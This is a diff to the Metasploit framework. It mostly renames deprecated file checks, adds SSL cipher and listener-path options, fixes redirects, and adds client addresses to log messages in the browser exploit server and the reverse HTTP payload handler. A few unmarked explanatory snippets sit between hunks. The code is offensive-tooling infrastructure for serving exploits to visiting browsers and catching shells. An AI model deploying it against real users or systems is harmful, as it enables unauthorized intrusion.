@ -227,4 +227,4 @@ module Msf::DBManager::Import::Nexpose::Raw
|
|||
end
|
||||
return ret
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -28,7 +28,7 @@ module Msf::DBManager::Import::Report
|
|||
report_id = report_report(report_info)
|
||||
|
||||
# Handle artifacts
|
||||
report.elements['artifacts'].elements.each do |artifact|
|
||||
report.elements.at('artifacts').elements.each do |artifact|
|
||||
artifact_opts = {}
|
||||
artifact.elements.each do |attr|
|
||||
skip_nodes = %w|id accessed-at|
|
||||
|
|
|
@ -329,7 +329,7 @@ module Msf::DBManager::ModuleCache
|
|||
next
|
||||
end
|
||||
|
||||
unless md.file and ::File.exists?(md.file)
|
||||
unless md.file and ::File.exist?(md.file)
|
||||
refresh << md
|
||||
next
|
||||
end
|
||||
|
|
|
@ -23,7 +23,7 @@ module Msf::DBManager::Report
|
|||
created = opts.delete(:created_at)
|
||||
updated = opts.delete(:updated_at)
|
||||
|
||||
unless File.exists? tmp_path
|
||||
unless File.exist? tmp_path
|
||||
raise Msf::DBImportError, 'Report artifact file to be imported does not exist.'
|
||||
end
|
||||
|
||||
|
@ -31,7 +31,7 @@ module Msf::DBManager::Report
|
|||
raise Msf::DBImportError "Could not move report artifact file to #{artifacts_dir}."
|
||||
end
|
||||
|
||||
if File.exists? new_path
|
||||
if File.exist? new_path
|
||||
unique_basename = "#{(Time.now.to_f*1000).to_i}_#{artifact_name}"
|
||||
new_path = File.join(artifacts_dir, unique_basename)
|
||||
end
|
||||
|
|
|
@ -33,7 +33,7 @@ module Msf::DBManager::Session
|
|||
# :session host is contained. Also used as the workspace for the
|
||||
# Mdm::ExploitAttempt and Mdm::Vuln. Defaults to Mdm::Workspace with
|
||||
# Mdm::Workspace#name equal to +session.workspace+.
|
||||
# @return [nil] if {Msf::DBManager#active} is +false+.
|
||||
# @return [nil] if Msf::DBManager#active is +false+.
|
||||
# @return [Mdm::Session] if session is saved
|
||||
# @raise [ArgumentError] if :session is not an {Msf::Session}.
|
||||
# @raise [ActiveRecord::RecordInvalid] if session is invalid and cannot be
|
||||
|
@ -68,7 +68,7 @@ module Msf::DBManager::Session
|
|||
# exploit that was used to open the session.
|
||||
# @option option [String] :via_payload the {MSf::Module#fullname} of the
|
||||
# payload sent to the host when the exploit was successful.
|
||||
# @return [nil] if {Msf::DBManager#active} is +false+.
|
||||
# @return [nil] if Msf::DBManager#active is +false+.
|
||||
# @return [Mdm::Session] if session is saved.
|
||||
# @raise [ArgumentError] if :host is not an Mdm::Host.
|
||||
# @raise [ActiveRecord::RecordInvalid] if session is invalid and cannot be
|
||||
|
@ -103,7 +103,7 @@ module Msf::DBManager::Session
|
|||
|
||||
protected
|
||||
|
||||
# @param session [Msf::Session] A session with a {db_record Msf::Session#db_record}
|
||||
# @param session [Msf::Session] A session with a db_record Msf::Session#db_record
|
||||
# @param wspace [Mdm::Workspace]
|
||||
# @return [void]
|
||||
def infer_vuln_from_session(session, wspace)
|
||||
|
@ -172,7 +172,7 @@ module Msf::DBManager::Session
|
|||
host = find_or_create_host(h_opts)
|
||||
sess_data = {
|
||||
datastore: session.exploit_datastore.to_h,
|
||||
desc: truncate_session_desc(session.info),
|
||||
desc: session.info,
|
||||
host_id: host.id,
|
||||
last_seen: Time.now.utc,
|
||||
local_id: session.sid,
|
||||
|
@ -212,7 +212,7 @@ module Msf::DBManager::Session
|
|||
sess_data = {
|
||||
host_id: host.id,
|
||||
stype: opts[:stype],
|
||||
desc: truncate_session_desc(opts[:desc]),
|
||||
desc: opts[:desc],
|
||||
platform: opts[:platform],
|
||||
via_payload: opts[:via_payload],
|
||||
via_exploit: opts[:via_exploit],
|
||||
|
@ -230,16 +230,4 @@ module Msf::DBManager::Session
|
|||
}
|
||||
end
|
||||
|
||||
# Truncate the session data if necessary
|
||||
#
|
||||
# @param desc [String]
|
||||
# @return [String] +desc+ truncated to the max length of the desc column
|
||||
def truncate_session_desc(desc)
|
||||
# Truncate the session data if necessary
|
||||
if desc
|
||||
desc = desc[0, ::Mdm::Session.columns_hash['desc'].limit]
|
||||
end
|
||||
desc
|
||||
end
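The effect of truncate_session_desc, assuming a desc column with a 255-character limit (the real limit comes from the Mdm::Session schema at runtime):

limit = ::Mdm::Session.columns_hash['desc'].limit   # e.g. 255
truncate_session_desc('A' * 1_000).length           # => 255 under that assumption
truncate_session_desc(nil)                          # => nil, passed through untouched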
|
||||
|
||||
end
|
||||
|
|
|
@ -537,7 +537,7 @@ protected
|
|||
#
|
||||
def find_context_key(buf, badchars, state)
|
||||
# Make sure our context information file is sane
|
||||
if !File.exists?(datastore['ContextInformationFile'])
|
||||
if !File.exist?(datastore['ContextInformationFile'])
|
||||
raise NoKeyError, "A context information file must be specified when using context encoding", caller
|
||||
end
|
||||
|
||||
|
|
|
@ -130,16 +130,12 @@ module Msf
|
|||
xploit.datastore['PAYLOAD'] = p.first[:payload_name]
|
||||
xploit.datastore['LPORT'] = p.first[:payload_lport]
|
||||
xploit.datastore['SRVHOST'] = datastore['SRVHOST']
|
||||
xploit.datastore['JsObfuscate'] = datastore['JsObfuscate'] if datastore['JsObfuscate']
|
||||
xploit.datastore['CookieName'] = datastore['CookieName'] if datastore['CookieName']
|
||||
xploit.datastore['VERBOSE'] = datastore['VERBOSE'] if datastore['VERBOSE']
|
||||
xploit.datastore['Retries'] = datastore['Retries'] if datastore['Retries']
|
||||
xploit.datastore['SSL'] = datastore['SSL'] if datastore['SSL']
|
||||
xploit.datastore['SSLVersion'] = datastore['SSLVersion'] if datastore['SSLVersion']
|
||||
xploit.datastore['URIHOST'] = datastore['URIHOST'] if datastore['URIHOST']
|
||||
xploit.datastore['URIPORT'] = datastore['URIPORT'] if datastore['URIPORT']
|
||||
xploit.datastore['LHOST'] = get_payload_lhost
|
||||
|
||||
%w(JsObfuscate CookieName VERBOSE Retries SSL SSLVersion SSLCipher URIHOST URIPORT).each do |opt|
|
||||
xploit.datastore[opt] = datastore[opt] if datastore[opt]
|
||||
end
|
||||
|
||||
# Set options only configurable by BAP.
|
||||
xploit.datastore['DisablePayloadHandler'] = true
|
||||
xploit.datastore['BrowserProfilePrefix'] = browser_profile_prefix
|
||||
|
@ -325,22 +321,14 @@ module Msf
|
|||
multi_handler.datastore['LHOST'] = get_payload_lhost
|
||||
multi_handler.datastore['PAYLOAD'] = payload_name
|
||||
multi_handler.datastore['LPORT'] = wanted[:payload_lport]
|
||||
multi_handler.datastore['DebugOptions'] = datastore['DebugOptions'] if datastore['DebugOptions']
|
||||
multi_handler.datastore['AutoLoadAndroid'] = datastore['AutoLoadAndroid'] if datastore['AutoLoadAndroid']
|
||||
multi_handler.datastore['PrependMigrate'] = datastore['PrependMigrate'] if datastore['PrependMigrate']
|
||||
multi_handler.datastore['PrependMigrateProc'] = datastore['PrependMigrateProc'] if datastore['PrependMigrateProc']
|
||||
multi_handler.datastore['InitialAutoRunScript'] = datastore['InitialAutoRunScript'] if datastore['InitialAutoRunScript']
|
||||
multi_handler.datastore['AutoRunScript'] = datastore['AutoRunScript'] if datastore['AutoRunScript']
|
||||
multi_handler.datastore['CAMPAIGN_ID'] = datastore['CAMPAIGN_ID'] if datastore['CAMPAIGN_ID']
|
||||
multi_handler.datastore['HandlerSSLCert'] = datastore['HandlerSSLCert'] if datastore['HandlerSSLCert']
|
||||
multi_handler.datastore['StagerVerifySSLCert'] = datastore['StagerVerifySSLCert'] if datastore['StagerVerifySSLCert']
|
||||
multi_handler.datastore['PayloadUUIDTracking'] = datastore['PayloadUUIDTracking'] if datastore['PayloadUUIDTracking']
|
||||
multi_handler.datastore['PayloadUUIDName'] = datastore['PayloadUUIDName'] if datastore['PayloadUUIDName']
|
||||
multi_handler.datastore['IgnoreUnknownPayloads'] = datastore['IgnoreUnknownPayloads'] if datastore['IgnoreUnknownPayloads']
|
||||
multi_handler.datastore['SessionRetryTotal'] = datastore['SessionRetryTotal'] if datastore['SessionRetryTotal']
|
||||
multi_handler.datastore['SessionRetryWait'] = datastore['SessionRetryWait'] if datastore['SessionRetryWait']
|
||||
multi_handler.datastore['SessionExpirationTimeout'] = datastore['SessionExpirationTimeout'] if datastore['SessionExpirationTimeout']
|
||||
multi_handler.datastore['SessionCommunicationTimeout'] = datastore['SessionCommunicationTimeout'] if datastore['SessionCommunicationTimeout']
|
||||
|
||||
%w(DebugOptions AutoLoadAndroid PrependMigrate PrependMigrateProc
|
||||
InitialAutoRunScript AutoRunScript CAMPAIGN_ID HandlerSSLCert
|
||||
StagerVerifySSLCert PayloadUUIDTracking PayloadUUIDName
|
||||
IgnoreUnknownPayloads SessionRetryTotal SessionRetryWait
|
||||
SessionExpirationTimeout SessionCommunicationTimeout).each do |opt|
|
||||
multi_handler.datastore[opt] = datastore[opt] if datastore[opt]
|
||||
end
|
||||
|
||||
# Configurable only by BAP
|
||||
multi_handler.datastore['ExitOnSession'] = false
|
||||
|
@ -409,8 +397,8 @@ module Msf
|
|||
# Checks if the module is multi-platform based on the directory path.
|
||||
#
|
||||
# @param m [Object] Module.
|
||||
# @return Module [TrueClass] is multi-platform.
|
||||
# @return Module [FalseClass] is not multi-platform.
|
||||
# @return [TrueClass] is multi-platform.
|
||||
# @return [FalseClass] is not multi-platform.
|
||||
def is_multi_platform_exploit?(m)
|
||||
m.fullname.include?('multi/')
|
||||
end
|
||||
|
@ -703,7 +691,7 @@ module Msf
|
|||
def on_request_uri(cli, request)
|
||||
# Check if target is on our whitelist
|
||||
if @whitelist && !is_ip_targeted?(cli.peerhost)
|
||||
print_status("Client is trying to connect but not on our whitelist.")
|
||||
print_status("Client #{cli.peerhost} is trying to connect but not on our whitelist.")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
@ -767,7 +755,7 @@ module Msf
|
|||
return datastore['HTMLContent']
|
||||
end
|
||||
elsif exploit_list.empty?
|
||||
print_status("No suitable exploits to send.")
|
||||
print_status("No suitable exploits to send for #{cli.peerhost}")
|
||||
if datastore['HTMLContent'].blank?
|
||||
send_not_found(cli)
|
||||
return ''
|
||||
|
|
|
@ -110,7 +110,7 @@ module Msf
|
|||
cap = datastore['PCAPFILE'] || ''
|
||||
|
||||
if (not cap.empty?)
|
||||
if (not File.exists?(cap))
|
||||
if (not File.exist?(cap))
|
||||
raise RuntimeError, "The PCAP file #{cap} could not be found"
|
||||
end
|
||||
self.capture = ::Pcap.open_offline(cap)
|
||||
|
@ -216,7 +216,7 @@ module Msf
|
|||
raise RuntimeError, "Could not access the capture process (remember to open_pcap first!)"
|
||||
end
|
||||
|
||||
if (not File.exists?(pcap_file))
|
||||
if (not File.exist?(pcap_file))
|
||||
raise RuntimeError, "The PCAP file #{pcap_file} could not be found"
|
||||
end
|
||||
|
||||
|
|
|
@ -1,4 +1,5 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'uri'
|
||||
require 'digest'
|
||||
require 'rex/proto/ntlm/crypt'
|
||||
|
@ -370,24 +371,47 @@ module Exploit::Remote::HttpClient
|
|||
return res unless res && res.redirect? && redirect_depth > 0
|
||||
|
||||
redirect_depth -= 1
|
||||
location = res.redirection
|
||||
return res if location.nil?
|
||||
|
||||
opts['redirect_uri'] = location
|
||||
opts['uri'] = location.path
|
||||
opts['rhost'] = location.host
|
||||
opts['vhost'] = location.host
|
||||
opts['rport'] = location.port
|
||||
|
||||
if location.scheme == 'https'
|
||||
opts['ssl'] = true
|
||||
else
|
||||
opts['ssl'] = false
|
||||
end
|
||||
return res if res.redirection.nil?
|
||||
|
||||
reconfig_redirect_opts!(res, opts)
|
||||
send_request_cgi!(opts, actual_timeout, redirect_depth)
|
||||
end
|
||||
|
||||
|
||||
# Modifies the HTTP request options for a redirection.
|
||||
#
|
||||
# @param res [Rex::Proto::HTTP::Response] HTTP Response.
|
||||
# @param opts [Hash] The HTTP request options to modify.
|
||||
# @return [void]
|
||||
def reconfig_redirect_opts!(res, opts)
|
||||
location = res.redirection
|
||||
|
||||
if location.relative?
|
||||
parent_path = File.dirname(opts['uri'].to_s)
|
||||
parent_path = '/' if parent_path == '.'
|
||||
new_redirect_uri = normalize_uri(parent_path, location.path.gsub(/^\./, ''))
|
||||
opts['redirect_uri'] = new_redirect_uri
|
||||
opts['uri'] = new_redirect_uri
|
||||
opts['rhost'] = datastore['RHOST']
|
||||
opts['vhost'] = opts['vhost'] || opts['rhost'] || self.vhost()
|
||||
opts['rport'] = datastore['RPORT']
|
||||
|
||||
opts['ssl'] = ssl
|
||||
else
|
||||
opts['redirect_uri'] = location
|
||||
opts['uri'] = location.path
|
||||
opts['rhost'] = location.host
|
||||
opts['vhost'] = location.host
|
||||
opts['rport'] = location.port
|
||||
|
||||
if location.scheme == 'https'
|
||||
opts['ssl'] = true
|
||||
else
|
||||
opts['ssl'] = false
|
||||
end
|
||||
end
|
||||
end
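Sketch of how a redirect flows through the rewritten send_request_cgi!/reconfig_redirect_opts! pair, from inside a module mixing in Exploit::Remote::HttpClient (URI and numbers are illustrative):

# A 302 to /app/login causes reconfig_redirect_opts! to rewrite 'uri',
# 'rhost', 'vhost', 'rport' and 'ssl', then the request is re-sent until
# a non-redirect response arrives or the redirect depth is exhausted.
res = send_request_cgi!({ 'uri' => '/app/' }, 20, 3)
res.redirect?   # => false unless the depth limit was hit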
|
||||
|
||||
#
|
||||
# Combine the user/pass into an auth string for the HTTP Client
|
||||
#
|
||||
|
|
|
@ -144,7 +144,8 @@ module Exploit::Remote::HttpServer
|
|||
},
|
||||
opts['Comm'],
|
||||
datastore['SSLCert'],
|
||||
datastore['SSLCompression']
|
||||
datastore['SSLCompression'],
|
||||
datastore['SSLCipher']
|
||||
)
|
||||
|
||||
self.service.server_name = datastore['HTTP::server_name']
|
||||
|
|
|
@ -47,7 +47,7 @@ module Exploit::Java
|
|||
end
|
||||
|
||||
toolsjar = File.join(ENV['JAVA_HOME'], "lib", "tools.jar")
|
||||
if (not File.exists? toolsjar)
|
||||
if (not File.exist? toolsjar)
|
||||
raise RuntimeError, 'JAVA_HOME does not point to a valid JDK installation.'
|
||||
end
|
||||
|
||||
|
@ -69,7 +69,7 @@ module Exploit::Java
|
|||
def save_to_file(classnames, codez, location)
|
||||
path = File.join( Msf::Config.install_root, "external", "source", location )
|
||||
|
||||
if not File.exists? path
|
||||
if not File.exist? path
|
||||
Dir.mkdir(path)
|
||||
end
|
||||
|
||||
|
@ -96,7 +96,7 @@ module Exploit::Java
|
|||
compile_options = [] if compile_options.nil?
|
||||
|
||||
# Create the directory if it doesn't exist
|
||||
Dir.mkdir(datastore['JavaCache']) if !File.exists? datastore['JavaCache']
|
||||
Dir.mkdir(datastore['JavaCache']) if !File.exist? datastore['JavaCache']
|
||||
|
||||
# For compatibility, some exploits need to have the target and source version
|
||||
# set to a previous JRE version.
|
||||
|
@ -157,7 +157,7 @@ module Exploit::Java
|
|||
|
||||
# Check if the keystore exists from previous run. If it does, delete it.
|
||||
msf_keystore = File.join(datastore['JavaCache'], msf_keystore)
|
||||
File.delete msf_keystore if File.exists? msf_keystore
|
||||
File.delete msf_keystore if File.exist? msf_keystore
|
||||
|
||||
# Rjb pukes on a CN with a comma in it so bad that it crashes to shell
|
||||
# and turns input echoing off. Simple fix for this ugly bug is
|
||||
|
|
|
@ -298,7 +298,9 @@ module Exploit::Remote::Postgres
|
|||
when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database
|
||||
when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database
|
||||
when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user
|
||||
when "Fmiscinit.c:L362:RInitializeSessionUserId" ; return {:preauth => "9.4.1-5"} # Bad user
|
||||
when "Fauth.c:L285:Rauth_failed" ; return {:preauth => "9.4.1-5"} # Bad creds, good database
|
||||
when "Fpostinit.c:L794:RInitPostgres" ; return {:preauth => "9.4.1-5"} # Good creds, non-existent but allowed database
|
||||
when "Fauth.c:L481:RClientAuthentication" ; return {:preauth => "9.4.1-5"} # bad user or host
|
||||
|
||||
# Windows
|
||||
|
|
|
@ -73,10 +73,10 @@ module Msf
|
|||
'vuln_test', # Example: "if(window.MyComponentIsInstalled)return true;",
|
||||
# :activex is a special case.
|
||||
# When you set this requirement in your module, this is how it should be:
|
||||
# [{:clsid=>'String', :method=>'String'}]
|
||||
# [:clsid=>'String', :method=>'String']
|
||||
# Where each Hash is a test case
|
||||
# But when BES receives this information, the JavaScript will return this format:
|
||||
# "{CLSID}=>Method=>Boolean;"
|
||||
# "CLSID=>Method=>Boolean;"
|
||||
# Also see: #has_bad_activex?
|
||||
'activex'
|
||||
])
|
||||
|
@ -216,7 +216,7 @@ module Msf
|
|||
|
||||
# Returns true if there's a bad ActiveX, otherwise false.
|
||||
# @param ax [String] The raw activex the JavaScript detection will return in this format:
|
||||
# "{CLSID}=>Method=>Boolean;"
|
||||
# "CLSID=>Method=>Boolean;"
|
||||
# @return [Boolean] True if there's a bad ActiveX, otherwise false
|
||||
def has_bad_activex?(ax)
|
||||
ax.to_s.split(';').each do |a|
|
||||
|
@ -271,12 +271,12 @@ module Msf
|
|||
|
||||
if tag.blank?
|
||||
# Browser probably doesn't allow cookies, plan B :-/
|
||||
vprint_status("No cookie received, resorting to headers hash.")
|
||||
vprint_status("No cookie received for #{cli.peerhost}, resorting to headers hash.")
|
||||
ip = cli.peerhost
|
||||
os = request.headers['User-Agent']
|
||||
tag = Rex::Text.md5("#{ip}#{os}")
|
||||
else
|
||||
vprint_status("Received cookie '#{tag}'.")
|
||||
vprint_status("Received cookie '#{tag}' from #{cli.peerhost}")
|
||||
end
|
||||
|
||||
tag
|
||||
|
@ -303,7 +303,7 @@ module Msf
|
|||
when :script
|
||||
# Gathers target data from a POST request
|
||||
parsed_body = CGI::parse(Rex::Text.decode_base64(request.body) || '')
|
||||
vprint_status("Received sniffed browser data over POST:")
|
||||
vprint_status("Received sniffed browser data over POST from #{cli.peerhost}")
|
||||
vprint_line("#{parsed_body}.")
|
||||
parsed_body.each { |k, v| profile[k.to_sym] = (v.first == 'null' ? nil : v.first) }
|
||||
found_ua_name = parsed_body['ua_name']
|
||||
|
@ -521,7 +521,7 @@ module Msf
|
|||
if datastore['CookieExpiration'].present?
|
||||
expires_date = (DateTime.now + 365*datastore['CookieExpiration'].to_i)
|
||||
expires_str = expires_date.to_time.strftime("%a, %d %b %Y 12:00:00 GMT")
|
||||
cookie << " Expires=#{expires};"
|
||||
cookie << " Expires=#{expires_str};"
|
||||
end
|
||||
cookie
|
||||
end
|
||||
|
@ -549,15 +549,15 @@ module Msf
|
|||
return
|
||||
end
|
||||
|
||||
print_status("Gathering target information.")
|
||||
print_status("Gathering target information for #{cli.peerhost}")
|
||||
tag = Rex::Text.rand_text_alpha(rand(20) + 5)
|
||||
ua = request.headers['User-Agent'] || ''
|
||||
print_status("Sending HTML response.")
|
||||
print_status("Sending HTML response to #{cli.peerhost}")
|
||||
html = get_detection_html(ua)
|
||||
send_response(cli, html, {'Set-Cookie' => cookie_header(tag)})
|
||||
|
||||
when /#{@flash_swf}/
|
||||
vprint_status("Sending SWF used for Flash detection")
|
||||
vprint_status("Sending SWF used for Flash detection to #{cli.peerhost}")
|
||||
swf = load_swf_detection
|
||||
send_response(cli, swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
|
||||
|
||||
|
@ -565,7 +565,7 @@ module Msf
|
|||
#
|
||||
# The detection code will hit this if Javascript is enabled
|
||||
#
|
||||
vprint_status "Info receiver page called."
|
||||
vprint_status "Info receiver page called from #{cli.peerhost}"
|
||||
process_browser_info(:script, cli, request)
|
||||
send_response(cli, '', {'Set-Cookie' => cookie_header(tag)})
|
||||
|
||||
|
@ -583,13 +583,13 @@ module Msf
|
|||
# on_request_exploit() to get the target information
|
||||
#
|
||||
tag = retrieve_tag(cli, request)
|
||||
vprint_status("Serving exploit to user with tag #{tag}")
|
||||
vprint_status("Serving exploit to user #{cli.peerhost} with tag #{tag}")
|
||||
profile = browser_profile[tag]
|
||||
if profile.nil?
|
||||
print_status("Browsing directly to the exploit URL is forbidden.")
|
||||
print_status("Browsing visiting directly to the exploit URL is forbidden.")
|
||||
send_not_found(cli)
|
||||
elsif profile[:tried] && !datastore['Retries']
|
||||
print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.")
|
||||
print_status("Target #{cli.peerhost} with tag \"#{tag}\" wants to retry the module, not allowed.")
|
||||
send_not_found(cli)
|
||||
else
|
||||
profile[:tried] = true
|
||||
|
@ -618,7 +618,7 @@ module Msf
|
|||
end
|
||||
|
||||
else
|
||||
print_error("Target has requested an unknown path: #{request.uri}")
|
||||
print_error("Target #{cli.peerhost} has requested an unknown path: #{request.uri}")
|
||||
send_not_found(cli)
|
||||
end
|
||||
end
|
||||
|
|
|
@ -163,8 +163,8 @@ module Exploit::Remote::SMTPDeliver
|
|||
print_error("Server refused our mail")
|
||||
else
|
||||
full_msg = ''
|
||||
full_msg << date
|
||||
full_msg << subject unless subject.nil?
|
||||
full_msg << date unless data =~ /date: /i
|
||||
full_msg << subject unless subject.nil? || data =~ /subject: /i
|
||||
full_msg << data
|
||||
send_status = raw_send_recv("#{full_msg}\r\n.\r\n", nsock)
|
||||
end
|
||||
|
|
|
@ -28,7 +28,8 @@ module Exploit::Remote::TcpServer
|
|||
register_advanced_options(
|
||||
[
|
||||
OptString.new('ListenerComm', [ false, 'The specific communication channel to use for this service']),
|
||||
OptBool.new('SSLCompression', [ false, 'Enable SSL/TLS-level compression', false ])
|
||||
OptBool.new('SSLCompression', [ false, 'Enable SSL/TLS-level compression', false ]),
|
||||
OptString.new('SSLCipher', [ false, 'String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"'])
|
||||
], Msf::Exploit::Remote::TcpServer)
|
||||
|
||||
register_evasion_options(
|
||||
|
@ -108,6 +109,7 @@ module Exploit::Remote::TcpServer
|
|||
'LocalPort' => srvport,
|
||||
'SSL' => ssl,
|
||||
'SSLCert' => ssl_cert,
|
||||
'SSLCipher' => ssl_cipher,
|
||||
'SSLCompression' => ssl_compression,
|
||||
'Comm' => comm,
|
||||
'Context' =>
|
||||
|
@ -195,6 +197,13 @@ module Exploit::Remote::TcpServer
|
|||
datastore['SSLCert']
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the SSLCipher option
|
||||
#
|
||||
def ssl_cipher
|
||||
datastore['SSLCipher']
|
||||
end
|
||||
|
||||
# @return [Bool] enable SSL/TLS-level compression
|
||||
def ssl_compression
|
||||
datastore['SSLCompression']
|
||||
|
|
|
@ -52,7 +52,7 @@ module Msf
|
|||
# @return [Integer]
|
||||
def bind_port
|
||||
port = datastore['ReverseListenerBindPort'].to_i
|
||||
port > 0 ? port : datastore['LPORT'].to_i
|
||||
(port > 0) ? port : datastore['LPORT'].to_i
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -46,7 +46,8 @@ module ReverseHttp
|
|||
register_options(
|
||||
[
|
||||
OptString.new('LHOST', [true, 'The local listener hostname']),
|
||||
OptPort.new('LPORT', [true, 'The local listener port', 8080])
|
||||
OptPort.new('LPORT', [true, 'The local listener port', 8080]),
|
||||
OptString.new('LURI', [false, 'The HTTP Path', ''])
|
||||
], Msf::Handler::ReverseHttp)
|
||||
|
||||
register_advanced_options(
|
||||
|
@ -71,12 +72,14 @@ module ReverseHttp
|
|||
end
|
||||
end
|
||||
|
||||
# Return a URI suitable for placing in a payload
|
||||
# A URI describing where we are listening
|
||||
#
|
||||
# @param addr [String] the address that
|
||||
# @return [String] A URI of the form +scheme://host:port/+
|
||||
def listener_uri(addr=datastore['LHOST'])
|
||||
def listener_uri(addr=datastore['ReverseListenerBindAddress'])
|
||||
addr = datastore['LHOST'] if addr.nil? || addr.empty?
|
||||
uri_host = Rex::Socket.is_ipv6?(addr) ? "[#{addr}]" : addr
|
||||
"#{scheme}://#{uri_host}:#{bind_port}/"
|
||||
"#{scheme}://#{uri_host}:#{bind_port}#{luri}"
|
||||
end
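With hypothetical datastore values, the rewritten listener_uri behaves roughly like this (an https handler with LURI set to 'admin' is assumed):

# ReverseListenerBindAddress unset -> fall back to LHOST
# LHOST = '2001:db8::1', LPORT = 8080, LURI = 'admin'
listener_uri   # => "https://[2001:db8::1]:8080/admin"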
|
||||
|
||||
# Return a URI suitable for placing in a payload.
|
||||
|
@ -84,29 +87,40 @@ module ReverseHttp
|
|||
# Host will be properly wrapped in square brackets, +[]+, for ipv6
|
||||
# addresses.
|
||||
#
|
||||
# @param req [Rex::Proto::Http::Request]
|
||||
# @return [String] A URI of the form +scheme://host:port/+
|
||||
def payload_uri(req)
|
||||
def payload_uri(req=nil)
|
||||
callback_host = nil
|
||||
|
||||
# Extract whatever the client sent us in the Host header
|
||||
if req && req.headers && req.headers['Host']
|
||||
callback_host = req.headers['Host']
|
||||
callback_host, callback_port = req.headers['Host'].split(":")
|
||||
callback_port = callback_port.to_i
|
||||
callback_port ||= (ssl? ? 443 : 80)
|
||||
end
|
||||
|
||||
# Override the host and port as appropriate
|
||||
if datastore['OverrideRequestHost'] || callback_host.nil?
|
||||
callback_name = datastore['OverrideLHOST'] || datastore['LHOST']
|
||||
callback_port = datastore['OverrideLPORT'] || datastore['LPORT']
|
||||
if Rex::Socket.is_ipv6? callback_name
|
||||
callback_name = "[#{callback_name}]"
|
||||
end
|
||||
callback_host = "#{callback_name}:#{callback_port}"
|
||||
callback_host = datastore['OverrideLHOST']
|
||||
callback_port = datastore['OverrideLPORT']
|
||||
end
|
||||
|
||||
"#{scheme}://#{callback_host}/"
|
||||
if callback_host.nil? || callback_host.empty?
|
||||
callback_host = datastore['LHOST']
|
||||
end
|
||||
|
||||
if callback_port.nil? || callback_port.zero?
|
||||
callback_port = datastore['LPORT']
|
||||
end
|
||||
|
||||
if Rex::Socket.is_ipv6? callback_host
|
||||
callback_host = "[#{callback_host}]"
|
||||
end
|
||||
|
||||
"#{scheme}://#{callback_host}:#{callback_port}"
|
||||
end
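The precedence the new payload_uri implements can be restated as a standalone sketch (this helper is illustrative only, not part of the handler API):

def sketch_payload_uri(host_header, override: false, lhost: '10.0.0.1', lport: 4444)
  host, port = host_header.to_s.split(':') if host_header
  host = port = nil if override                # OverrideRequestHost ignores the Host header
  host = lhost if host.nil? || host.empty?     # fall back to the configured host
  port = lport if port.nil? || port.to_i.zero? # fall back to the configured port
  host = "[#{host}]" if host.include?(':')     # bracket IPv6 literals
  "http://#{host}:#{port}"
end

sketch_payload_uri('cb.example.com:8443')   # => "http://cb.example.com:8443"
sketch_payload_uri(nil)                     # => "http://10.0.0.1:4444"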
|
||||
|
||||
# Use the {#refname} to determine whether this handler uses SSL or not
|
||||
# Use the #refname to determine whether this handler uses SSL or not
|
||||
#
|
||||
def ssl?
|
||||
!!(self.refname.index('https'))
|
||||
|
@ -120,8 +134,31 @@ module ReverseHttp
|
|||
(ssl?) ? 'https' : 'http'
|
||||
end
|
||||
|
||||
# The local URI for the handler.
|
||||
#
|
||||
# @return [String] Representation of the URI to listen on.
|
||||
def luri
|
||||
l = datastore['LURI'] || ""
|
||||
|
||||
if l && l.length > 0
|
||||
# strip trailing slashes
|
||||
while l[-1] == '/'
|
||||
l = l[0...-1]
|
||||
end
|
||||
|
||||
# make sure the luri has the prefix
|
||||
if l[0] != '/'
|
||||
l = "/#{l}"
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
l.dup
|
||||
end
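The luri normalization above amounts to: leave an empty value alone, strip trailing slashes, force a single leading slash. A standalone restatement (sketch_luri is not part of the handler):

def sketch_luri(l)
  return '' if l.nil? || l.empty?
  l = l.sub(%r{/+\z}, '')            # strip trailing slashes
  l.start_with?('/') ? l : "/#{l}"   # ensure the leading slash
end

sketch_luri('admin/')   # => "/admin"
sketch_luri('')         # => ""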
|
||||
|
||||
# Create an HTTP listener
|
||||
#
|
||||
# @return [void]
|
||||
def setup_handler
|
||||
|
||||
local_addr = nil
|
||||
|
@ -154,13 +191,10 @@ module ReverseHttp
|
|||
|
||||
self.service.server_name = datastore['MeterpreterServerName']
|
||||
|
||||
# Create a reference to ourselves
|
||||
obj = self
|
||||
|
||||
# Add the new resource
|
||||
service.add_resource("/",
|
||||
service.add_resource(luri + "/",
|
||||
'Proc' => Proc.new { |cli, req|
|
||||
on_request(cli, req, obj)
|
||||
on_request(cli, req)
|
||||
},
|
||||
'VirtualDirectory' => true)
|
||||
|
||||
|
@ -178,7 +212,7 @@ module ReverseHttp
|
|||
#
|
||||
def stop_handler
|
||||
if self.service
|
||||
self.service.remove_resource('/')
|
||||
self.service.remove_resource(luri + "/")
|
||||
if self.service.resources.empty? && self.sessions == 0
|
||||
Rex::ServiceManager.stop_service(self.service)
|
||||
end
|
||||
|
@ -231,22 +265,25 @@ protected
|
|||
#
|
||||
# Parses the HTTPS request
|
||||
#
|
||||
def on_request(cli, req, obj)
|
||||
def on_request(cli, req)
|
||||
Thread.current[:cli] = cli
|
||||
resp = Rex::Proto::Http::Response.new
|
||||
info = process_uri_resource(req.relative_resource)
|
||||
uuid = info[:uuid] || Msf::Payload::UUID.new
|
||||
|
||||
# Configure the UUID architecture and payload if necessary
|
||||
uuid.arch ||= obj.arch
|
||||
uuid.platform ||= obj.platform
|
||||
uuid.arch ||= self.arch
|
||||
uuid.platform ||= self.platform
|
||||
|
||||
conn_id = nil
|
||||
conn_id = luri
|
||||
if info[:mode] && info[:mode] != :connect
|
||||
conn_id = generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
|
||||
conn_id << generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
|
||||
else
|
||||
conn_id << req.relative_resource
|
||||
conn_id = conn_id.chomp('/')
|
||||
end
